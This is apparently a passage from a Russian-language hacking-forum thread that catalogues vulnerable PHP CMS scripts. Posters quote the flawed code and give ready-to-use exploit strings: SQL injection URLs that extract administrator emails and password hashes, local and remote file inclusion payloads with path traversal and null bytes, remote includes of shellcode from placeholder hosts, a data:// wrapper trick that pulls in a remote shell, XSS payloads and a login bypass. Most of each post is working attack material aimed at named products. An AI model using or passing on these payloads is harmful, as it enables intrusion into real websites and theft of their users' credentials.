Энциклопедия уязвимых скриптов

Discussion in 'Веб-уязвимости' started by DIAgen, 1 Jun 2006.

  1. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    733
    Likes Received:
    646
    Reputations:
    251
    mForum

    Активная XSS:
    1. Создаём топик с javascript:alert()
    2. usercp.php?mode=edit_profile : Image link = javascript:alert()
    Код:
    PHP:
    if ($_POST[avatar2] != "" AND $_POST[deleteavatar] == "") {
    #THIRDIF#
    $len strlen($_POST[avatar2]) - 4;
    $check_ext substr($_POST[avatar2],$len,strlen($_POST[avatar2]));
    if (
    $check_ext != ".gif" AND $check_ext != ".jpg")
    profile_error("$lang[138]");
    $_POST[avatar2] = str_replace(">"""$_POST[avatar2]);
    $_POST[avatar2] = str_replace("<"""$_POST[avatar2]);
    $_POST[avatar2] = str_replace("\""""$_POST[avatar2]);
    if (
    strlen($_POST[avatar2]) > 200 OR strlen($_POST[avatar2]) < 7)
    profile_error("$lang[140]");
    $query_av "UPDATE $table_users SET avatar=\"$_POST[avatar2]\" WHERE id=\"$_SESSION[user_id]\" LIMIT 1";
    if (
    mysql_query($query_av,$db))
    print 
    "<li>$lang[141]</li>";
    #THIRDIF#
    }
    3. post.php?mode=pvt javascript:alert()
     
    1 person likes this.
  2. m0Hze

    m0Hze Elder - Старейшина

    Joined:
    1 Nov 2008
    Messages:
    267
    Likes Received:
    644
    Reputations:
    208
    Product: Opus CMS
    Author: http://opus.cx/
    Version: 2.28

    Blind-SQL

    Во всех файлах админки, присутствует ф-ция check_author_cookie();, которая проверяет админ вы или нет,и если нет - exit();. Но в этом файле ее воткнули после кода,а не сначала его-же.Поэтому есть возможность поковыряться в бд ведь и про фильтрацию они тоже забыли.
    file: /adm/backup.php
    PHP:
    if ( isset($_GET["email"]) )
    {
        if ( 
    $vp_author mysql_fetch_array(mysql_db_query(VPUMP_DATABASE"select * from vp_author where email = '"[email protected]$_GET["email"]."' and password = '"[email protected]$_GET["password"]."'")) )
    target: 7 columns in table.
     
  3. m0Hze

    m0Hze Elder - Старейшина

    Joined:
    1 Nov 2008
    Messages:
    267
    Likes Received:
    644
    Reputations:
    208
    Product: x3CMS
    Author: http://www.x3cms.net/
    Version: 0.3.2.1

    LFI

    file:
    page.php
    PHP:
    $p explode('/'$_REQUEST['pp']);
    $a array_shift($p);
    ...
    $d = (isset($_REQUEST['d'])) ? $_REQUEST['d'] : '';    // addon
    ...
        
    $aa array_shift($p);
        if (empty(
    $d)) {
            include 
    './engine/'.$aa;
        }
        else if (
    $aa != 'install') {
            include 
    './add-on/'.$d.'/engine/'.$aa;
        }
        else {
            include 
    './add-on/'.$d.'/install.php';
        }
    target: ?pp=engine&d=../../lfi.php%00
     
  4. m0Hze

    m0Hze Elder - Старейшина

    Joined:
    1 Nov 2008
    Messages:
    267
    Likes Received:
    644
    Reputations:
    208
    Product: Bmachine
    Author: http://boastology.com/
    Version: 3.1

    SQL-inj

    file:
    login.php
    PHP:
    $user=$db->query("SELECT user_login,last_login,user_pass,level FROM ".MY_PRF."users WHERE user_login='{$_POST['user_login']}'"false);
    target: {POST} ?login=1'+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*
     
    1 person likes this.
  5. m0Hze

    m0Hze Elder - Старейшина

    Joined:
    1 Nov 2008
    Messages:
    267
    Likes Received:
    644
    Reputations:
    208
    Product: OpenEngine
    Author: http://www.openengine.de/html/pages/de/index.htm
    Version: 1.9.1

    SQL-inj

    /* нужны права администратора */
    file: system/03_admin/ajax/index.php

    PHP:
    $page_path_new $_POST["path"];
            
    $query "SELECT * FROM ".$db_praefix."page WHERE page_path = '$page_path_new'";
            
    $result mysql_query($query);
            echo 
    mysql_num_rows($result);
    target: {POST} ?path=1'+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3,40,41,42,43,44,45,46/*
     
    4 people like this.
  6. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    MachCMS 1.0 Local File Inclusion

    MachCMS 1.0
    Web site : http://machcms.sourceforge.net
    Version : 1.0
    Author : Arthur Wiebe



    [Local File Inclusion]

    Vuln file: classes/Template.php [str:61]

    PHP:
            if (file_exists("pages/$page.page/main.php")) {
                
    $template $this;
                require_once(
    "pages/$page.page/main.php");
                
    $this->parse();        
      }
    Exploit:
    if magic_quotes = OFF

    Code:
    http://[host]/[path]/index.php?q=../../../../../../../../[COLOR=Green][local_file][/COLOR]%00
    © RulleR aka Pin4eG​
     
    #246 RulleR, 11 Dec 2009
    Last edited: 11 Dec 2009
    4 people like this.
  7. m0Hze

    m0Hze Elder - Старейшина

    Joined:
    1 Nov 2008
    Messages:
    267
    Likes Received:
    644
    Reputations:
    208
    Уязвимости DirectNews

    Product: DirectNews
    Author: http://www.direct-news.fr/
    Version: 4.10


    RFI

    Необходимо для правильной работы RFI! register_globals = ON and allow_url_open = ON!

    file: /admin/menu.php
    PHP:
    if (empty($from_inc))
    {
        
    header('HTTP/1.1 403 Forbidden');
        
    $rootpath '..';
        require_once (
    $rootpath .'/templates/error/HTTP_FORBIDDEN.php');
         die();
    }
    include_once 
    $rootpath .'/library/lib.menu.php';
    include_once 
    $rootpath .'/modules/menu/lib/treemenu.inc.php';
    target:?from_inc=1&rootpath=http://yousite.ru/shellcode.txt?

    file: /admin/menu_xml.php
    PHP:
    include_once $rootpath .'/library/lib.menu.php';
    include_once 
    $rootpath .'/modules/menu/lib/treemenu.inc.php';
    target:?rootpath=http://yousite.ru/shellcode.txt?

    file: /inc.php
    PHP:
    if (empty($from_inc))
    {
        
    header('HTTP/1.1 403 Forbidden');
         
    $rootpath '../..';
        require_once (
    '../../templates/error/HTTP_FORBIDDEN.php');
         die();
    }

    include_once 
    $rootpath .'/modules/menu/lib/PHPLIB.php';
    include_once 
    $rootpath .'/modules/menu/lib/layersmenu-common.inc.php';
    include_once 
    $rootpath .'/library/lib.menu.php';
    Как видно,проверяеться наличие конфига,и только после - инклуд.Заинклудить из http:// неполучиться,зато file_exists(); отлично работает с ftp :)
    target:?rootpath=ftp://user:p[email protected]/shellcode.txt?

    file: /modules/menu/menu_layer.php
    PHP:
    if (empty($from_inc))
    {
        
    header('HTTP/1.1 403 Forbidden');
         
    $rootpath '../..';
        require_once (
    '../../templates/error/HTTP_FORBIDDEN.php');
         die();
    }

    include_once 
    $rootpath .'/modules/menu/lib/PHPLIB.php';
    include_once 
    $rootpath .'/modules/menu/lib/layersmenu-common.inc.php';
    include_once 
    $rootpath .'/library/lib.menu.php';
    Тут попроще.
    target:?from_inc=3&rootpath=http://yousite.ru/shellcode.txt?


    file: /admin/inc.php
    PHP:
    i$from_inc true

    header("Content-Type: text/html; charset=utf-8");

    if (!
    file_exists($rootpath .'/config.php')) {
        
    header('Location: '$adminroot .'/install/');
        die();
    }

    // Compatibilite entre les versions de PHP
    require_once $rootpath .'/library/lib.compatibility.php';

    // gestion de session
    require_once $rootpath .'/library/class.config.php';
    require_once 
    $rootpath .'/modules/panier/class.panier_article.php';
    Как видно,проверяеться наличие конфига,и только после - инклуд.Заинклудить из http:// неполучиться,зато file_exists(); отлично работает с ftp :)
    target:?rootpath=ftp://user:p[email protected]/shellcode.txt?

    Blind SQL-inj

    file: /index.php
    PHP:
    if (isset($_GET['lang']))
    {
        
    $_SESSION[DN_UID]['lg'] = $_GET['lang'];
    }
    else
    {
        
    $_SESSION[DN_UID]['lg'] = $_GET['lg'];
    }

    $lg $_SESSION[DN_UID]['lg'];

    $requete 'SELECT code 
                FROM '
    $name_table_language .
                WHERE code = "'
    $lg .'" 
                AND site = "1"'
    ;
    $resultat mysql_query($requete);
    target:В таблие 7 полей ?lang=1'+union+select+1,2,3,4,5,7/*

    file: /modules/ajax/remote.php
    PHP:
    if (isset($_POST['ajax']))
    {
        switch (
    $_POST['ajax'])
        {
            case 
    'showComments' :
                                print(
    showComments($_POST));
                break;
            case 
    'postComment'    :
                                print(
    postComment($_POST));
                break;
            default : print(
    true);
                break;
        }
    }
    /
    Функция/
    function 
    postComment($post)
    {
        global 
    $rootpath$lg$name_table_commentaires;
        
        if (!empty(
    $post['noMessage']))
        {
            
    $author            = !empty($post['author']) ? $post['author'] : '';
            
    $email            = !empty($post['email']) ? $post['email'] : '';
            
    $url            = !empty($post['url']) ? $post['url'] : '';
            
    $text_comment    = !empty($post['text_comment']) ? $post['text_comment'] : '';
            
            
    $tri            getSqlValue('SELECT MAX(tri) + 1 FROM '$name_table_commentaires .' WHERE noMessage = '$post['noMessage']);
    target:9 columns
     
    #247 m0Hze, 11 Dec 2009
    Last edited: 11 Dec 2009
    3 people like this.
  8. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    SQL Injection

    Vuln file: system/02_page/includes/admin.php [str:368]
    PHP:
    $query "SELECT * FROM ".$db_praefix."page WHERE (page_path = '$page_path') AND (page_status <= ".$account_status.") $access";
    $result mysql_query($query);
    Exploit:
    ------------------------------------------------------------------------
    http://[host]/cms/website.php?id=xek')+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,concat_ws(0x3a,account_email,account_password),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+oe_account+where+account_group=2+--+

    ------------------------------------------------------------------------
    *вывод в title
    Интересная инъекция, далее показано что еще можно из нее выжать :)

    LFI

    Vuln file: system/02_page/includes/lang.php [str:48]
    PHP:
    $query "SELECT lang_short from ".$db_praefix."language order by lang_short";
    $result mysql_query($query);
    closeDB($link);
    while (
    $row mysql_fetch_array($result))
    {
        
    $lang_list .= $row["lang_short"].",";
    }
    if (
    strlen($lang_list) > 0)
    {
        
    $lang_list substr($lang_list,0,strlen($lang_list)-1);
    }
    if (isset(
    $_GET["admin"]))
    {
        include(
    "system/00_settings/language_packs/lang_".$lang_admin.".php");
    }
    else
    {
        include(
    "system/00_settings/language_packs/lang_".$lang_input.".php");
    }
    Exploit:
    ------------------------------------------------------------------------
    http://[host]/cms/website.php?id=xek')+union+select+null,null,null,null,'/../../../../../[local_file]%00',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+--+
    ------------------------------------------------------------------------

    Чтение произвольных файлов

    Vuln file: system/02_page/start.php [str:52]
    PHP:
                        $fp fopen($incurl.$page["page_include"], "r");
                        if (
    $fp)
                        {
                            while(!
    feof($fp))
                            {
                                
    $content .= fread($fp,"10000");
                            }
                            
    fclose($fp);
                        }
                                            echo 
    $content;
    Exploit:
    ------------------------------------------------------------------------
    http://[host]/cms/website.php?id=xek')+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,'../../../[local_file]',null,null,null,null,null,null,null+--+
    ------------------------------------------------------------------------
    Для успешной эксплуатации необходимо:
    magic quotes = OFF
     
    #248 RulleR, 11 Dec 2009
    Last edited: 11 Dec 2009
    3 people like this.
  9. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    смотрим фаил website.php
    PHP:
    define("_ISLOADED",1);
    if (
    file_exists("_config/config.php"))
    {
        require(
    "_config/config.php");    
    }
    else
    {
        die(
    "openEngine ERROR: Choose <a href='system/setup/index.php'>Installation</a> or check your current system");    
    }
    require(
    "system/00_settings/start.php");
    if (
    $site_encoding != "noencoding")
    {
        
    header('content-type: text/html; charset='.$site_encoding);
    }
    require(
    "system/01_user/start.php");
    require(
    "system/02_page/start.php");
    if (
    isAdmin())

        require(
    "system/03_admin/start.php"); 
    }
    require(
    "system/00_settings/end.php");
    ?>
    видим что инклудится фаил system/00_settings/start.php, смотрим start.php:
    PHP:
    require("system/00_settings/includes/database.php");
    require(
    "system/00_settings/includes/settings.php");
    смотрим database.php:
    PHP:
    function closeDB($link)
    {
        
    mysql_close($link);
    }
    и почему closeDB() будет ундефинид функцион? ;)

    ты бы проверил на локалхосте, все прекрасно инклудится...
     
  10. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    Symphony CMS 2.0.6 Local File Inclusion

    Symphony CMS 2.0.6
    Web site : http://symphony-cms.com
    Version : 2.0.6


    [Local File Inclusion]

    Vuln file: index.php [str:9]
    PHP:
        function renderer($mode='frontend'){
            require_once(
    CORE "/class.{$mode}.php");
            return (
    $mode == 'administration' Administration::instance() : Frontend::instance());
        }
        
        
    $renderer = (isset($_GET['mode']) ? strtolower($_GET['mode']) : 'frontend');
        
    $output renderer($renderer)->display(getCurrentPage());
    Exploit:
    if magic_quotes = OFF
    Code:
    http://[host]/[path]/index.php?mode=/../../../../../../[COLOR=Green][local_file][/COLOR]%00
     
    4 people like this.
  11. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    BareNuked CMS v. 1.1.0
    CMS = BareNuked CMS

    SQL injection
    url - http://localhost/index.php?term=
    Exploit -
    Code:
    http://localhost/index.php?term=1'/**/and/**/1=0/**/union/**/all/**/select/**/0,concat(0x76657273696f6e0d0a,0x3a,version()),0,0,2,0,0,0,0,0,0,0--+&search=search
    Passive XSS
    search ===> "><script>alert();</script>
    or
    Exploit -
    Code:
    http://localhost/?term="><script>alert();</script>&search=search
    NooMS

    Passive XSS
    Exploit -
    Code:
    http://localhost/search.php?q="><script>alert();</script>
    SQL injection in admin panel
    Exploit
    Code:
    http://localhost/admin.php?op=comments&action=listarticles&section_id=1/**/and/**/1=0/**/union/**/all/**/select/**/1,concat_ws(char(42,42,42),user(),database(),version()),3,4,5,6,7,8,9
     
    2 people like this.
  12. m0Hze

    m0Hze Elder - Старейшина

    Joined:
    1 Nov 2008
    Messages:
    267
    Likes Received:
    644
    Reputations:
    208
    Product: ReloadCMS
    Author: http://reloadcms.com/
    Version: 1.2.7

    LFI

    file: rss.php
    PHP:
    if(!empty($_GET['m']) &&  !empty($system->config['enable_rss']) && !empty($system->feeds[$_GET['m']])){
        
    $module $_GET['m'];
        
    header('Content-Type: text/xml');
        
    $feed = new rss_feed($system->config['title'] . ' - ' $system->feeds[$module][0], $system->url$system->feeds[$module][1], $system->config['encoding'], $system->config['language'], $system->config['copyright']);
        
    $m = (!empty($system->feeds[$module][2])) ? $system->feeds[$module][2] : $module;
        if(
    is_readable(MODULES_PATH $m '/rss.php')) include(MODULES_PATH $m '/rss.php');
    target: ?m=../../config/config.ini%00
     
    6 people like this.
  13. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    Product: PicoFlatCMS
    Version: 0.6.1
    Exploit:
    Code:
    http://localhost/index.php?pagina=[file]
     
    1 person likes this.
  14. m0Hze

    m0Hze Elder - Старейшина

    Joined:
    1 Nov 2008
    Messages:
    267
    Likes Received:
    644
    Reputations:
    208
    Product: Ariadne CMS
    Author: http://www.ariadne-cms.org/
    Version: 2.6.1
    RFI

    Need: register_globals = ON and allow_url_include = ON

    file: /winges/tree/root.php
    PHP:
      if (!isset($layout) || (!$layout)) {
        
    $layout="./frames.js";
      } else {
        
    $layout=ereg_replace("[\./\\]","",$layout).".js";
      }
      include(
    $layout);
    По сути есть фильтр,но Ctacok научил юзать data://, поэтому обход прост.
    target: ?layout=data:,<?php include $_GET[hello] ?>&hello=http://yousite.com/shell.txt?
     
    #254 m0Hze, 12 Dec 2009
    Last edited: 12 Dec 2009
  15. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,390
    Likes Received:
    1,209
    Reputations:
    475
    ^^ еще версия PHP >= 5.2.0
    и не allow_url_open, а allow_url_include
     
    #255 Spyder, 12 Dec 2009
    Last edited: 12 Dec 2009
    1 person likes this.
  16. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    Product - ZAKRZAK
    Version - 0.01
    Active XSS
    Url - http://localhost/index.php?page=gbook
    Exploit
    Code:
    '"/><script>alert("xss");</script>
    Раскрытые Пути
    Code:
    http://localhost/index.php?page=settings&part[]=
     
    1 person likes this.
  17. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    ClanTiger CMS 1.0<=1.1.3 Local File Inclusion

    ClanTiger CMS
    Web site : http://www.clantiger.com
    Vesrion : 1.0<=1.1.3


    [Local File Inclusion]

    Vuln file: functions/class.language.php [str:73]
    PHP:
            if(isset($_GET['lang']))
            {
                
    $selectedLanguage $_GET['lang'];
            }
            else if(
    $_COOKIE['lang'])
            {
                
    $selectedLanguage $_COOKIE['lang'];
            }
            else
            {
                
    // resort to default
                
    $selectedLanguage $settings['language'];
            }
            
            
    // see whether the language exists
            
    if(!in_array($selectedLanguage,$this->validLanguages,true))
            {
                
    $this->selectedLanguage $this->validLanguages[$settings['language']];
            }
            else
            {
                
    $this->selectedLanguage $this->validLanguages[$selectedLanguage];
            }
            
            
            
    // attempt to load in the translations file
            
    if([email protected]_once(ROOTPATH 'language/' strtolower($selectedLanguage) . '.php'))
    Exploit #1:
    Code:
    http://[COLOR=White][host][/COLOR]/[COLOR=White][path][/COLOR]/index.php?lang=../../../../../../../[COLOR=Green][local_file][/COLOR]%00
    Exploit #2:
    Code:
    GET http://[COLOR=White][host][/COLOR]/[COLOR=White][path][/COLOR]/index.php HTTP/1.0
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    Host: [COLOR=White][host][/COLOR]
    Content-Length: 59
    Connection: Close
    Cookie: lang=../../../../../../../[COLOR=Green][local_file][/COLOR]%00
    Для успешной эксплуатации необходимо:
    magic quotes = OFF
     
    2 people like this.
  18. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    DynPG CMS 4.0.0
    Web site : http://www.dynpg.org
    Vesrion : 4.0.0


    [Remote File Inclusion]

    Vuln file: counter.php [str:15]
    PHP:
        $inc = empty($_GET["inc"]) ? $_GET["inc"];

        if ( !empty(
    $inc) ) {
            
    # Aufruf des Counters ьber einen Link. $inc enthдlt dann die Datenbankkennung!

            
    $inc_or   htmlentities(urldecode($inc));
            
    $inc_head urldecode(str_replace('&amp;''&'$inc));
            
    $inc      addslashes(strtolower($inc));

            if ( empty(
    $GLOBALS["DefineRootToTool"]) ) {
                
    $GLOBALS["DefineRootToTool"] = "";
            }

            require_once 
    $GLOBALS["DefineRootToTool"]."config.php";
    Exploit:
    if register_globals = ON && allow_url_include = ON
    Code:
    http://[host]/[path]/counter.php?inc=1&DefineRootToTool=[COLOR=DarkOrange][shell][/COLOR]?
    [Local File Inclusion]

    Vuln file: languages.inc.php [str:5]
    PHP:
       global $lang_dpg;

       require_once 
    dirname(__FILE__) . '/plugins/languages.php';
       require_once 
    dirname(__FILE__) . '/localised/dynpg_backend/'.strtolower($_SESSION["LANGUAGE"]).'.lang.php';
    Exploit:
    if register_globals = ON && magic_quotes = OFF
    Code:
    http://[host]/[path]/languages.inc.php?_SESSION[LANGUAGE]=../../../../../../../../[COLOR=Green][local_file][/COLOR]%00
     
    1 person likes this.
  19. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    337
    Likes Received:
    142
    Reputations:
    81
    Программа: MySmartBB 1.1.0
    Сайт: mysmartbb.com
    Описание уязвимости: возможен обход авторизации
    Уязвимый код login.php:
    PHP:
    $password md5($_POST['T2']);
         
    $check    $DB->sql_query("SELECT * FROM MySBB_member WHERE username='" $_POST['T1'] . "' AND password='" $password "'");
         
    $num      $DB->sql_num_rows($check);
    эксплойт:
    Code:
    login: 'or+5=5#
    password: asdfg
    
    если версия MySQL = 5 то можно вывести данные из бд таким POST запросом:
    Code:
    T1='+and+1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((select+concat_ws(0x3a,username,password,email)+from+mysbb_member+limit+1),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((select+concat_ws(0x3a,username,password,email)+from+mysbb_member+limit+1),14)e)b)a)+--+&T2=1233&B1=%E3%E6%C7%DD%DE
    
     
    4 people like this.
  20. Xcontrol212

    Xcontrol212 Elder - Старейшина

    Joined:
    13 Feb 2008
    Messages:
    254
    Likes Received:
    110
    Reputations:
    7
    AmiroCMS-Free-5.4.4.0
    Раскрытие путей

    Code:
    http://localhost:7777/eshop_final.php
    Code:
    Fatal error: main() [function.require]: Failed opening required '_shared/code/includes/eshop_final.php' (include_path='.;/usr/local/php/PEAR') in C:\WebServers\home\localhost\www\AmiroCMS\home\localhost\www\eshop_final.php on line 4
    Code:
    http://localhost:7777/unattened.old.php
    Code:
    Parse error: syntax error, unexpected T_STRING in C:\WebServers\home\localhost\www\AmiroCMS\home\localhost\www\unattened.old.php on line 4
    Уязвимую часть кода к сожалению не смогу показать,зазендено,потом выложу,когда раззендю;)
     
    2 people like this.
Loading...